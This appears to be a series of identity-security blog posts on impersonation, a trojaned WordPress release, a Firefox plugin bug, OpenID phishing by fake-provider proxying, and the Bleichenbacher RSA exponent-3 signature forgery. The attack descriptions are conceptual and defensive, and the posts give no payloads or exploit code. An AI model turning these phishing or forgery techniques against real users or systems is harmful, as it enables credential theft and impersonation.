Jon Udell on the Sierra affair

Jon Udell put up this thought-inducing piece on the widely discussed Sierra affair earlier this week, picking up on my piece and the related comment by Richard Gray.   

Kim Cameron had the same reaction to the Sierra affair as I did: Stronger authentication, while no panacea, would be extremely helpful. Kim writes:

Maybe next time Allan and colleagues will be using Information Cards, not passwords, not shared secrets. This won’t extinguish either flaming or trolling, but it can sure make breaking in to someone’s site unbelievably harder.

Commenting on Kim’s entry, Richard Gray (or, more precisely, a source of keystrokes claiming to be one of many Richard Grays) objects on the grounds that all is hopeless so long as digital and real identities are separable:

For so long identity technical commentators have pushed the idea that a person’s digital identity and their real identity can be tightly bound together then suddenly, when the weakness is finally exposed everyone once again is forced to say ‘This digital identity is nothing more than a string puppet that I control. I didn’t do this thing, some other puppet master did.’

Yep, it’s a problem, and there’s no bulletproof solution, but we can and should make it a lot harder for the impersonating puppet master to seize control of the strings.

Elsewhere, Stephen O’Grady asks whether history (i.e., a person’s observable online track record) or technology (i.e., strong authentication) is the better defense.

My answer to Stephen is: You need both. I’ve never met Stephen in person, so in one sense, to me, he’s just another source of keystrokes claiming to represent a person. But behind those keystrokes there is a mind, and I’ve observed the workings of that mind for some years now, and that track record does, as Stephen says, powerfully authenticate him.

“Call me naive,” Stephen says, “but I’d like to think that my track record here counts for something.”

Reprising the comment I made on his blog: it counts for a lot, and I rely on mine in just the same way for the same reasons. But: counts for whom? Will the millions who were first introduced to Kathy Sierra and Chris Locke on CNN recently bother explore their track records and reach their own conclusions?

More to the point, what about Alan Herrell’s1 track record? I would be inclined to explore it but I can’t, now, without digging it out of the Google cache.

The best defense is a strong track record and an online identity that’s as securely yours as is feasible.

The identity metasystem that Kim Cameron has been defining, building, and evangelizing is an important step in the right direction. I thought so before I joined Microsoft, and I think so now.

It’s not a panacea. Security is a risk continuum with tradeoffs all along the way. Evaluating the risk and the tradeoffs, in meatspace or in cyberspace, is psychologically hard. Evaluating security technologies, in both realms, is intellectually hard. But in the long run we have no choice, we have to deal with these difficulties.

The other day I lifted this quote from my podcast with Phil Libin:

The basics of asymmetric cryptography are fundamental concepts that any member of society who wants to understand how the world works, or could work, needs to understand.

When Phil said, that my reaction was, “Oh, come on, I’d like to think that could happen but let’s get real. Even I have to stop and think about how that stuff works, and I’ve been aware of it for many years. How can we ever expect those concepts to penetrate the mass consciousness?”

At 21:10-23:00 in the podcast2, Phil answers in a fascinating way. Ask twenty random people on the street why the government can’t just print as much money as it wants, he said, and you’ll probably get “a reasonable explanation of inflation in some percentage of those cases.” That completely abstract principle, unknown before Adam Smith, has sunk in. Over time, Phil suggests, the principles of asymmetric cryptography, as they relate to digital identity, will sink in too. But not until those principles are embedded in common experiences, and described in common language.

Beyond Stephen O'Grady's piece, the reactions of Jon's readers are of interest too.  In fact, I'm going to post Richard's comments so that everyone gets to see them. 

Name that scam

Received this email from a reader.  Has anyone any idea what was going on? 

Yesterday afternoon, at approx 2:10pm, I started receiving emails (and phone calls) from a variety of websites, mostly financial (home loans, car loans, debt consolidation) but also other services (BMC music, TheScooterStore, Netflix).. claiming to be responding to requests from me (at their websites) for services or information. 

I’ve received about a dozen emails over the past 24hrs, and about the same number of phone calls at home and about half a dozen at work. 
So somebody is entering my name and personal information (home & work phone, work email, home address & home value – all relatively public info – so far nothing worse like SSN or other credit info) into a variety of websites and signing me up for various services. 

Some of these websites (I have spoken with several sales people on the phone) are part of marketing networks that either share or sell such information (leads) and I have tracked several of these down to a common source.. although it appears that are at least several root sources involved. 

My question is this: what is the scam? 

Its possible its just personal harassment and there is someone out there that is trying to give me a bad time or is playing a not-so-funny joke. 

It doesn’t feel like identity theft – they don’t seem to have private info, but instead seem to have assembled some relatively public info and are inputting that into a bunch of websites. 

Could this be someone trying to defraud a marketing network? If so, do you know how that works? 

Ever heard of anything like this before? (maybe this is a common thing?) 

Btw, at least some of the companies contacting me are legit (QuickenLoans for example, and they were quite helpful on the phone) so it seems the “fraud” is on the input side?

I asked the person who was the target of this attack how he knew for sure he had been speaking with people from QuickenLoans, for example.  It seems they just seemed credible, and helpful, so he never questioned their claims or asked to call them back.

It all reminds me of this.

Transducers and Delegation

Ernst Lopez Cordozo recently posted a very interesting comment about delegation issues:

“We always use delegation: if I use a piece of software on my machine to login to a site or application, it is that piece of software (e.g. the CardSpace client) that does the transaction, claiming it is authorized to do so.

“But if the software is compromised, it may misrepresent me or even somebody else. Is there a fundamental difference between software on my (owned? managed? checked?) machine and a machine under somebody else’s control?”

Ernst’s “We always use delegation” may be true, but risks losing sight of important distinctions. Despite that, it invites us to think about complex issues.

Analog-to-Digital transducers

There are modules within one's operating system whose job it is to vehicle our language and responses by sensing our behavior through a keyboard or mouse or microphone, and transforming it into a stream of bits.

The sensors constitute a transducer performing a conversion of our behavior from the physical to the digital worlds. Once converted, this behavior is communicated to service endpoints (local or distant) through what we’ve called “channels”.

There are lots of examples of similar transducers in more specialized realms – anywhere that benefit is to be had by converting physical being to electrical impulses or streams of bits. And there are more examples of this every day.

Consider the accelerator pedal in your car. Last century, it physically controlled gas flowing to your engine. Today, your car may not even use gas… If it does, there are more efficient ways of controlling fuel injection than with raw foot pressure… The “accelerator” has been transformed into a digital transducer. Directly or indirectly, it now generates a digital representation of how much you want to accelerate; this is fed into a computer as one of several inputs that actually regulate gas flow (or an electric engine).

Microphones make a more familiar example. Their role is to take sounds, which are physical vibrations, and convert them into micro currents that can then be harnessed directly – or digitized. So again, we have a transducer. This one feeds a channel representing the sound-field at the microphone.

I’m certain that Ernst would not argue that we “delegate” control of acceleration to the foot pedal in our car – the “foot-pedal-associated-components” constitute the transducer that conveys our intentions to engine control systems.

Similarly, no singer – recording through a microphone into a solid-state recording chain – would think of herself as “delegating” to the microphone… The microphone is just the transducer that converts the singer's voice from the physical realm to the electrical – hopefully introducing as little color as possible. The singer delegates to her manager or press representative – not to her microphone.

So I think we need to tease apart two classes of things that we want done when using computers. One is for our computers to serve as colorless transducers through which we can “become digital”, responding ourselves to digital events.

The other is for computers to “act in our stead” – analyze inputs, apply logic and policy (perhaps one day intuition?), and make decisions for us, or perform tasks, in the digital sphere.

Through the transducer systems, we are able to “dictate” onto post-physical media. The system which “takes dictation” performs no interpretation. It is colorless, a transcription from one medium to another. Dictation is the promulgation of “what I say”: stenography in the last century; digitization in this.

When we type at our keyboard and click with our mouse, we dictate to obedient digital scribes that convert our words and movements into the digital realm, rather than onto papyrus. These scribes differ from the executors and ambassadors and other reactive agents who are our “delegates”. There is in this sense a duality with the transducer on one side and the delegate on the other.

Protection of the channel

No one ever worried about evil parties intercepting the audio stream when Maria Callas stood before a microphone. That is partly because the recording equipment was protected through physical security; and partly because there was no economic incentive to do so.

In the early days, computers were like that too. The primitive transducer comprised a rigid and inalterable terminal – if not a punch card reader – and the resulting signal travelled along actual WIRES under the complete control of those managing the system.

Over time the computing components became progressively more dissociated. Distances grew and wires began to disappear: ensuring the physical security of a distributed system is no longer possible. As computers evolved into being a medium of exchange for business, the rewards for subverting them increased disproportionally.

In this environment, the question becomes one of how we know the “digital dictation” received from a transducer has not been altered on the way to the recipient. There is also a fundamental question about who is gave the dictation in the first place.

In the digital realm, the only way to ensure integrity across component boundaries is through cryptography. One wants the dictation to be cryptographically protected – as close to the transducer as possible. The ideal answer is: “Protect the dictation in the transducer to ensure no computer process has altered it”. This is done by giving the transducer a key. Then we can have secure digital dictation.

Compromise of software

Ernst talks about software compromise. Clearly, other things being equal, the tighter the binding between a transducer (taken in a wide sense) and its cryptographic module, the less opportunity there is for attack on the dictation channel. Given digital physics, this equates to reduction of the software surface area. It is thus best to keep processes and components compartmentalized, with clear boundaries, clear identities.

This, in itself, is a compelling reason to partition activities: the transducer being one component; processes taking this channel as an input then having separate identities.

Going forward we can expect there will be widely available hardware-based Trusted Platform Modules capable of ensuring that only a trusted loader will run. Given this, one will see loaders that will only allow trusted transducers to run. If this is combined with sufficiently advanced virtualization, we can predict machines that will achieve entirely new levels of security.


Given the distinctions being presented here, I see CardSpace as a transducer capable of bringing the physical human user into the digital identity system. It provides a context for the senses and translates her actions and responses into underlying protocol activities. It aims at adding no color to her actions, and at taking no decisions on its own. 

In this sense, it is not the same as a process performing delegation – and if we say it is, then we have started making “delegation” such a broad concept that it doesn’t say much at all. This lack of precision may not be the end of the world – perhaps we need new words all the way round. But in the meantime, I think separating transducers from entities that are proactive on our behalf is an indispensible precondition to achieving systems with enough isolation between components that they can be secure in the profound ways that will be required going forward.

Comment problem seems due to Firefox bug

As Pamela explains, it was neither the upgrade to WordPress 2.0.2 (made necessary by a security vulnerability discovered in WordPress 2.0.1), nor the nifty Pamela Project code, that has been causing problems when using non-Windows Card Selectors with Firefox on my blog.  Instead, it is the latest rev of Firefox itself (bugs are being filed).

For anyone who is using the “xmldap Identity Selector” Firefox plugin on the Mac and has suddenly found that they are unable to log into the PamelaWare Test Blog or Product Blog or Pat’s or Kim’s blogs, the problem is not with the blogs themselves. The problem appears to be buggy nastiness in the Mac version of Firefox, which wreaks havoc with Chuck’s plugin (xmldap Identity Selector v0.8.6) . If you uninstall Firefox and then install Firefox from (get release here), you will again be able to authenticate to everyone’s blogs once again. The Safari plugin works as well, so if you want to remain on Firefox, you could satisfy your Information Card needs by using that plugin on your Mac instead.

We now return you to your regularly scheduled blog commenting :)

A number of people also discovered a less severe problem where comments ended up in a manual approval queue rather than being automatically posted even after InfoCard login.  If you have logged in with an InfoCard you should be getting automated instant access.  As far as I can tell, this now works properly.

Please keep me posted about any other issues.  This will help everyone using WordPress with the Pamela Project plugin.

Final note:  automated trackbacks will also be slowed down for a while I strengthen the trackback spam filter (gee – too bad there is no delegated authentication yet…)  If you want me to see a posting quickly please drop an i-names email.

WordPress 2.1.1 dangerous, Upgrade to 2.1.2

Any product that is really successful is going to be attacked.  Over time the attacks will become progressively more sophisticated.  Given how popular – and how good – WordPress is, it doesn't surprise me that it has attracted enough attention that someone eventually broke through. 

Guess what?  I'm running 2.1.1 in my test environment.  Good thing I haven't flicked the switch.  Anyway, here's the scoop as explained by WordPress:

Long story short: If you downloaded WordPress 2.1.1 within the past 3-4 days, your files may include a security exploit that was added by a cracker, and you should upgrade all of your files to 2.1.2 immediately.

Longer explanation: This morning we received a note to our security mailing address about unusual and highly exploitable code in WordPress. The issue was investigated, and it appeared that the 2.1.1 download had been modified from its original code. We took the website down immediately to investigate what happened.

It was determined that a cracker had gained user-level access to one of the servers that powers, and had used that access to modify the download file. We have locked down that server for further forensics, but at this time it appears that the 2.1.1 download was the only thing touched by the attack. They modified two files in WP to include code that would allow for remote PHP execution.

This is the kind of thing you pray never happens, but it did and now we’re dealing with it as best we can. Although not all downloads of 2.1.1 were affected, we’re declaring the entire version dangerous and have released a new version 2.1.2 that includes minor updates and entirely verified files. We are also taking lots of measures to ensure something like this can’t happen again, not the least of which is minutely external verification of the download package so we’ll know immediately if something goes wrong for any reason.

Finally, we reset passwords for a number of users with SVN and other access, so you may need to reset your password on the forums before you can login again. (More here…)

Am I ever relieved that I'm using Project Pamela's InfoCard plugin in the new environment!  I haven't written about it yet, since I've been evaluating the beta.  But thanks to Project Pamela, I will just have to download 2.1.2, and change one line in one WordPress file to get InfoCard login working with it.  Let's drink a toast to proper factoring!  I'll be writing about this amazing plugin soon.

By the way, I have good news for the old-fashioned.  I'll be able to turn on username / password for comments again, since version 2.1.2 gets over the registration vulnerabilities in my current version. 

The whole episode brings up the interesting question of how to secure a widely distributed software project.  The more desirable you are as a target, the better the tools you need.  One day I hope to talk to the WordPress folks about incorporating InfoCards into their development process.


Scary phishing video from gnucitizen

Here's a must-see that punctuates our current conversation with – are you ready? – drama and numerous other arts.

Beyond the fact that it's just plain cool – and scary – as a production, it underlines one of the main points we need to get across.  The evolution of the virtual world will be blocked until we can make it as safe as the physical one. 

As Pam says, “this video really captures the panic involved in being hacked…”.  That's for sure.

Ben Laurie and the “Kittens” phishing attack.

Here's a post about potential OpenID phishing problems by Ben Laurie, long-time security avocate who played an important role in getting SSL into open source.  He's now at Google.  Don't misinterpret his intentions despite his characteristically colorful introductory sentence – in a subsequent piece he makes it clear that he too wants to find solutions to these problems.

OpenID announced the release of a new draft of OpenID Authentication 2.0 today. I’m reluctantly forced to come to the conclusion that the OpenID people don’t care about phishing, since they’ve defined a standard that has to be the worst I’ve ever seen from a phishing point of view.

OK, so what’s the problem? If I’m a phisher my goal is to be able to log in to some website, the Real Website, as you, the Innocent Victim. In order to do this, I persuade you to go to a website I control that looks like the Real Website. When you log in, thinking it is the Real Website, I get your username and password, and I can then proceed to empty your Paypal account, write myself cheques from your bank account, or whatever fiendish plan I have today.

So, why does OpenID make this worse? Because in the standard case, I (the phisher) have to make my website look like the Real Website and persuade you to go to it somehow – i.e. con you into thinking I am the real Paypal, and your account really has been frozen (or is that phrozen?) and you really do need to log in to unphreeze it.

But in the OpenID case I just persuade you to go anywhere at all, say my lovely site of kitten photos, and get you to log in using your OpenID. Following the protocol, I find out where your provider is (i.e. the site you log in to to prove you really own that OpenID), but instead of sending you there (because, yes, OpenID works by having the site you’re logging in to send you to your provider) I send you to my fake provider, which then just proxies the real provider, stealing your login as it does. I don’t have to persuade you that I’m anything special, just someone who wants you to use OpenID, as the designers hope will become commonplace, and I don’t have to know your provider in advance.

So, I can steal login credentials on a massive basis without any tailoring or pretence at all! All I need is good photos of kittens.

I had hoped that by constantly bringing this up the OpenID people might take some step to deal with the issue, but they continue to insist on punting on it entirely:

The manner in which the end user authenticates to their OP [OpenID provider] and any policies surrounding such authentication is out of scope for this document.

which means, in practice, people will authenticate using passwords in forms, as usual. Which means, in turn, that phishing will be trivial.

Like me, Ben was struck with how readily the system currently lends itself to automation of phishing attacks.  His second post on the subject is also interesting.


As simple as possible – but no simpler

Gunnar Peterson recently showed me a posting by Andy Jaquith ( and JSPWiki) that combines coding, wiki, identity, Cardspace, cybervandals, and OpenID all into one post – a pretty interesting set of memes.  Like me, he finally actually shut off anonymous commentary because he couldn't stand the spam workload, and is looking for answers:

Last week's shutoff of this website's self-registration system was something I did with deep misgivings. I've always been a fan of keeping the Web as open as possible. I cannot stand soul-sucking, personally invasive registration processes like the New York Times website. However, my experience with a particularly persistent Italian vandal was instructive, and it got me thinking about the relationship between accountability and identity.

Some background. When you self-register on you supply a desired “wiki name”, a full name, a desired login id, and optionally a e-mail address for password resets. We require the identifying information to associate specific activities (page edits, attachment uploads, login/log out events) with particular members. We do not verify the information, and we trust that the user is telling truth. Our Italian vandal decided to abuse our trust in him by attaching pr0n links to the front page. Cute.

The software we use here on has decent audit logs. It was a simple matter of identifying the offending user account. I know which user put the porn spam on the website, and I know when he did it. I also know when he logged in, what IP address he came from, and what he claimed his “real” name was. But although I've got a decent amount of forensic information available to me, what I don't have any idea of whether the person who did it supplied real information when he registered.

And therein lies the paradox. I don't want to keep personal information about members — but at the same time, I want to have some degree of assurance that people who choose to become members are real people who have serious intent. But there's no way to get any level of assurance about intent. After alll, as the New Yorker cartoon aptly put it, on the Internet no-one knows if you're a dog. Or just a jackass.

During the holiday break, I did a bit of thinking and exploration about how to address (note I do not say “solve”) issues of identity and accountability, in the context of website registration. Because I am a co-author of the software we use to run this website (JSPWiki), I have a fair amount of freedom in coming up with possible enhancements.

One obvious way to address self-registration identity issue is to introduce a vetting system into the registration process. That is, when someone registers, it triggers a little workflow that requires me to do some investigation on the person. I already do this for the mailing list, so it would be a logical extension to do it for the wiki, too. This would solve the identity issue — successfully vetting someone would enable the administrator to have much higher confidence in their identity claims, albeit with some sacrifice

There's just one problem with this — I hate vetting people. It takes time to do, and I am always far, far behind.

A second approach is to not do anything special for registration, but moderate page changes. This, too, requires workflow. On the JSPWiki developer mailing lists, we've been discussing this option quite a bit, in combination with blacklists and anti-spam heuristics. This would help solve the accountability problem.

A third approach would be to accept third-party identities that you have a reasonable level of assurance in. Classic PKI (digital certificates) are a good example of third-party identities that you can inspect and choose to trust or not. But client-side digital certificates have deployment shortcomings. Very few people use them.

A promising alternative to client-side certificates is the new breed of digital identity architectures, many of which do not require a huge, monolithic corporate infrastructure to issue. I'm thinking mostly of OpenID and Microsoft's CardSpace specs. I really like what Kim Cameron has done with CardSpace; it takes a lot of the things that I like about Apple's Keychain (self-management, portability, simple user metaphors, ease-of-use) and applies it specifically to the issue of identity. CardSpace‘s InfoCards (I have always felt they should be called IdentityCards) are kind of like credit cards in your wallet. When you want to express a claim about your identity, you pick a card (any card!) and present it to the person who's asking.

What's nice about InfoCards is that, in theory, these are things you can create for yourself at a registrar (identity provider) of your choice. InfoCards also have good privacy controls — if you don't want a relying party (e.g., to see your e-mail identity attribute, you don't have to release that information.

So, InfoCards have promise. But they use the WS-* XML standards for communication (think: big, hairy, complicated), and they require a client-side supplicant that allows users to navigate their InfoCards and present them when asked. It's nice to see that there's a Firefox InfoCard client, but there isn't one for Safari, and older versions of Windows are still left out in the cold. CardSpace will make its mark in time, but it is still early, methinks.

OpenID holds more promise for me. There are loads more implementations available (and several choices for Java libraries), and the mechanism that identity providers use to communicate with relying parties is simple and comprehensible by humans. It doesn't require special software because it relies on HTTP redirects to work. And best of all, the thing the identity is based on is something “my kind of people” all have: a website URL. Identity, essentially, boils down to an assertion of ownership over a URL. I like this because it's something I can verify easily. And by visiting your website, I can usually tell whether the person who owns that URL is my kind of people.

OpenID is cool. I got far enough into the evaluation process to do some reasonably serious interoperability testing with the SXIP and JanRain libraries. I mocked up a web server and got it to sucessfully accept identities from the Technorati and VeriSign OpenID services. But I hit a few snags.

Recall that the point of all of this fooling around is to figure out a way to balance privacy and authenticity. By “privacy”, I mean that I do not want to ask users to disgorge too much personal information to me when they register. And correspondingly, I do not want the custodial obligation of having to store and safeguard any information they give me. The ideal implementation, therefore, would accept an OpenID identity when presented, dyamically collect the attributes we want (really, just the full name and websute URL) and pull them into our in-memory session, and flush them at the end of the session. In other words, the integrity of the attributes presented, combined with transience yields privacy. It's kind of like the front-desk guard I used to see when I consulted to the Massachussetts Department of Mental Health. He was a rehabilitated patient, but his years of illness and heavy treatment left him with no memory for faces at all. Despite the fact I'd visited DMH on dozens of occasions, every time I signed in he would ask “Have you been here before? Do you know where you are going?” Put another way, integrity of identity + dynamic attribute exchange protocols + enforced amnesia = privacy.

By “authenticity” I mean having reasonable assurance that the person on my website is not just who they say they are, but that I can also get some idea about their intentions (or what they might have been). OpenID meets both of these criteria… if I want to know something more about the person registering or posting on my website, I can just go and check ’em out by visiting their URL.

But, in my experiments I found that the attribute-exchange process needs work… I could not get VeriSign's or Technorati's identity provider to release to my relying website the attributes I wanted, namely my identity's full name and e-mail addresses. I determined that this was because neither of these identity providers support what the OpenID people call the “Simple Registration” profile aka SREG.

More on this later. Needless to say, I am encouraged by my progress so far. And regardless of the outcome of my investigations into InfoCard and OpenID, my JSPWiki workflow library development continues at a torrid pace.

Bottom line: once we have a decent workflow system in place, I'll open registrations back up. And longer term, we will have more some open identity system choices.

Hmmm.  Interesting thoughts that I want to explore more over the next while.

Before I get to the nitty-gritty, please note that Cardspace and InfoCards do NOT require a client-side wiki or web site to use WS-* protocols

The system supports WS-*, which gives it the ability to handle upper-end scenarios, but doesn't require it and can operate in a RESTful mode! 

So the actual effort required to implement the client side is on the same order of magnitude as for OpenID.  But I agree there are not very many open-source options out there for doing this yet – requiring more creativity on the part of the implementor.  I'm trying to help with this.

It's also true that InfoCards require client software (although there are ways around this if someone is enterprising: you could build an infocard selector that “lives in the cloud”).

But the advantages of InfoCard speak clearly too.  Andy Jaquist would find that release of user information is built right in, and that “what you see is what you get” – user control.  Further, the model doesn't expose the user to the risk that personal information will become public by being posted on the web.  This makes it useful in a number of applications which OpenID can't handle without a lot of complexity.

But what's the core issue? 

InfoCards change the current model in which the user can be controlled by an evil site.  OpenID doesn't.

if a user ends up at an evil site today, it can pose as a good site known to the user by scooping the good site's skin so the user is fooled into entering her username and passord.

But think of what we unleash with OpenID…

It's way easier for the evil site to scoop the skin of a user's OpenID service because – are you ready? – the user helps out by entering her honeypot's URL!

By playing back her OpenID skin the evil site can trick the user into revealing her creds.  But these are magic creds,  the keys to her whole kingdom!  The result is a world more perilous than the one we live in now.

If that isn't enough, evil doers armed with identifiers and ill-gotten creds can then crawl the web to see where the URL they have absconded with is in play, and break into those locations too.

The attacks on OpenID all lend themselves to automation…

One can say all this doesn't matter because these are low-value identities, but I think it is a question of setting off on the wrong foot unless we build the evolution of OpenID into it.

It will really be a shame if all the interest in new identity technology leads to security breaches worse than those that currently exist, and brings about a further demoralization of the user.

I'd like to see OpenID and InfoCard technologies come together more.  I'll be presenting a plan for that over the next little while.


Anti-phishing Mashup

Here's a site dedicated to phishing control that has produced a bizarre mashup that I find fascinating – Web 2.0 meets Magnum PI.  It combines information from the Anti-Phishing Working Group with novel visualization techniques and animation so you can analyse the topologies of phishing trips over time.

A phishing message arrives in your mailbox, pretending to be from a bank, or from an etailer such as eBay or Paypal. It directs you to a web page and asks you to enter your password or social security number to verify your identity, but the web page is not one actually associated with the bank; it's on some other server.

InternetPerils has discovered that those phishing servers cluster, and infest ISPs at the same locations for weeks or months.

Here's an example of a phishing cluster in Germany, ever-changing yet persistent for four months, according to path data collected and processed by InternetPerils, using phishing server addresses from the Anti-Phishing Working Group (APWG) repository.

Phishing Cluster over Time

Figure 1: A Persistent Phishing Cluster

The ellipses in this animation represent servers; the boxes represent routers; and the arrows show the varying connectivity among them. Colors of boxes reflect ownership of parts of the network. Times are GMT.

The animation demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.

Graphs were produced using PerilScopeâ„¢, which is InternetPerils‘ interactive topology examination interface, based upon the GAIN platform.

Go to their site to see the actual animated mashup.

Openssl vulnerability

Ben Laurie and Matasano Chargen describe a significant attack on RSA signature implementation (not the algorithm itself).  Quoting from Matasano:

Bell Labs crypto shaolin Daniel Bleichenbacher disclosed a freaky attack on RSA signature implementations that may, under some common circumstances, break SSL/TLS.

Do I have your attention? Good, because this involves PKCS padding, which is not exciting. Bear with me.

RSA signatures use a public signing keypair with a message digest (like SHA1) to stamp a document or protocol message. In RSA, signing and verification are analogs of decryption and encryption. To sign a message, you:

  1. Hash it
  2. Expand the (short) hash to the (long) size of the RSA modulus
  3. Convert that expansion to a number
  4. RSA decrypt the number
  5. Convert that to a series of bytes, which is your signature.

It’s step 2 we care about here. It’s called “padding”. You need it because RSA wants to encrypt or decrypt something that is the same size as the RSA key modulus.

There are a bunch of different ways to pad data before operating on it, but the one everyone uses is called PKCS#1 v1.5 (technically, EMSA-PKCS1-V1_5-ENCODE). It involves tacking a bunch of data in front of your hash, enough to pad it out to the size of the modulus:


Note the order and placement of those boxes. They’re all variable length. Let’s call that out:


The two big goals of a padding scheme are (a) expanding messages to the modulus length and (b) making it easy to correctly recover the message bytes later, regardless of what they are. This padding scheme is designed to make that straightforward. The padding bytes are clearly marked (“00 01”, which tells you that PKCS#1 v1.5 is in use), terminated (with a 00, which cannot occur in the padding), and followed by a blob of data with a length field. This whole bundle of data is what RSA works on.

The problem is, despite all the flexiblity PKCS#1 v1.5 gives you, nobody expects you to ever use any of it. In fact, a lot of software apparently depends on data being laid out basically like the picture above. But all the metadata in that message gives you other options. For instance:


For some RSA implementations, this could be an acceptable message layout. It’s semantically invalid, but can appear syntactically valid. And if you don’t completely unpack and check all the metadata in the signature, well, this can happen:

  1. Determine the padding from the fixed header bytes.
  2. Scan until the terminator.
  3. Scoop out the hash information.
  4. Use the hash to confirm you’re looking at the same message that the “signer” signed.
  5. Use the signature to confirm that a real “signer” signed it.

The problem is that this attack breaks the connection between (4) and (5). The hash, now “centered” instead of “right-justified”, doesn’t really mean anything, because the signature covers a bunch more bits.

This is all trivia without some value for “evil” that lets you substitute an arbitrary message hash (and thus an arbitrary message) into an otherwise valid-looking signature. Enter Bleichenbacher’s attack.

RSA takes parameters, one of which is a “public exponent”, which is part of the public key. If that exponent is “3”, which it often is, an attacker can exploit broken signature validation code to forge messages. The math here, which Bleichenbacher claims is simple enough to do with a pencil and paper, gets a bit hairy for me (I lose it at polynomials). Dino explains it better than I do. The long and the short of it is, you validate an RSA signature by computing:

s ^ e = m (mod n)

(where “e” is the public exponent, “n” is the public modulus, and “s” is the signature) and verifying that you get the same result as applying steps (1) and (2) from the signature process yourself. But:

  1. If the public exponent is “3”, and
  2. you inject the right “evil” bits into the PKCS data to make it a perfect cube, then
  3. you can create a something that broken RSA will validate.

Good technical details in Hal Finney’s OpenPGP post (OpenPGP is not vulnerable). And a security advisory for OpenSSL (OpenSSL is vulnerable, through 0.9.8b).

Two things have gone wrong here:

  1. Implementations misparse signatures, assuming that a syntactically valid-looking hash is semantically operative.
  2. For the common RSA exponent parameter “3”, there’s a straightforward way to manipulate a bogus signature to make it look valid.

My understanding is, the demonstrated attack sticks the evil bits outside of the DigestInfo (the hash data). The way I see the bug being described, broken implementations are just scanning the buffer without “fully decoding it”, implying that if they just validated the ASN.1 metadata against the signature buffer they’d be OK. That may be true, but it seems possible that a blind “memcmp” on an over-long SHA1 octet string, which would be ASN.1-valid and leave the Digest at the end of the buffer, could also trigger the same bug.

This is only a problem if:

  1. You’re running broken code
  2. You’re relying on certificate validation
  3. The certificates you’re validating use an exponent of “3”

Unfortunately, although the default for OpenSSL is “65537” (no practical attack known for that), “3” is common alternative: it’s faster, especially in embedded environments. Ferguson and Schneier recommend it in Practical Cryptography. Checking the CA bundle for “curl”:

cat curl-ca-bundle.crt | grep Exponent | grep “: 3” | wc -l

gives 6 hits, from Digital Signature Trust Co. and Those same certs are in Firefox. Firefox doesn’t use OpenSSL; it uses NSS, and I don’t know if NSS is vulnerable. Here’s the code. I see it extracting a SHA1 hash’s worth of data, and don’t see it checking to make sure that date exhausts the buffer, but I don’t know the code well. Safari also depends on OpenSSL.

Correct me on any of these points and I’ll amend the post. I haven’t tested this (although Google Security did a proof of concept against OpenSSL that precipitated the advisory).

You should upgrade to the most recent OpenSSL. Bleichenbacher also recommended people stop using signing keys with a “3” exponent.